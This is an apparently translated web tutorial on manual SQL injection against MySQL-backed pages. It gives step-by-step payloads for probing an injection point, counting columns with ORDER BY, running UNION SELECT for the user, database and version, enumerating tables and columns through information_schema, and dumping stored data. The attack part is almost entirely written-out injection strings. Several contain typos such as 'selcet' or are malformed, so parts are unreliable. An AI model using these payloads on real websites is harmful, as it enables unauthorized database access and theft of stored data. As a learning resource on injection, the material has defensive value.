This article brings you issues related to manual injection in SQL, including issues related to determining the injection point and determining the injection type. I hope it will be helpful to everyone.
1. Single quotation mark method: add a single quotation mark directly after the URL. If the page cannot be displayed normally, the browser will return some exceptions information, it indicates that the link may have a sql injection vulnerability
2.1=1 and 1=2: Add and 1=1 to the get parameter after the URL, the display is normal, replace 1=1 with 1 =2, the display is abnormal, indicating that there is SQL injection in the web page.
1. Numeric injection: the value of the injected variable does not need to be enclosed in quotation marks, such as
select * from user where id=$id;
2. Character injection: the injected variable will be used Wrap it in quotation marks, such as `
select * from user where username='$username';`
Be sure to close the quotation marks when injecting.
3. Search injection:
select * from user where username like '%$pass%';
Construct the sql statement as
select * from user where username like '%$pass%' union select语句 '%%';
That is, the transferred variable is pass%’ union select statement ‘% to form a closure.
Determine whether the injection point submission method is get, post, or cookie through packet capture and other methods.
Use the order by statement to query how many fields there are in the database. You can determine the number of database fields through constant attempts. For example, when entering oeder by 9, the page When an error is reported and order by 8 is entered, the page displays normally, that is, there are 8 fields in the database.
For example, the query statement is: select * from user where id='$id';
The following input can be constructed: (id = ') ' order by 3 ' --
That is, the query statement is: select * from user where id='' order by 3 '--'
Use the union select statement to query the current user user(), database database(), database version version(), server operating system @@version_compile_os and other information
The version version is very important. If the version In 5.0 and above, you can use the information_schema library to easily query the desired information
Construction statement:
select * from user where id='' union select user(),database(),version()+--+;
5.0 or above The information_schema library that comes with the mysql database stores all table names and listed information in the database.
Next we should check the information of all tables named tables according to the result of the current database query in step 5 (for example, the database is database_1). Information_schema.tables
: A table that records all table name information in the database.
The constructed query statement is as follows:
Select * from user where id='' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database_1;--
The result of the query is: the table name information in the current database queried in the fifth step. Information_schema.columns:
Records the column name information of all tables in the database;
Next, you should query its columns based on the table name information obtained from the above query (for example, the table is table_1) Name information, construct the statement as follows:
Select * from user where id='' union selcet 1,group_concat(column_name),3 from information_schema.columns where table_name=table_1;--
After querying the column name, you can directly find out the information stored in the table through a joint query (for example, the found column names are column_1, column_2) Constructing the statement
Selcet * from user where id='' union select 1,column_1,column_2 from tables;--
You can query the stored data in the specified table of the specified database
Recommended learning: mysql video tutorial
The above is the detailed content of Let's talk about the simple manual SQL injection process. For more information, please follow other related articles on the PHP Chinese website!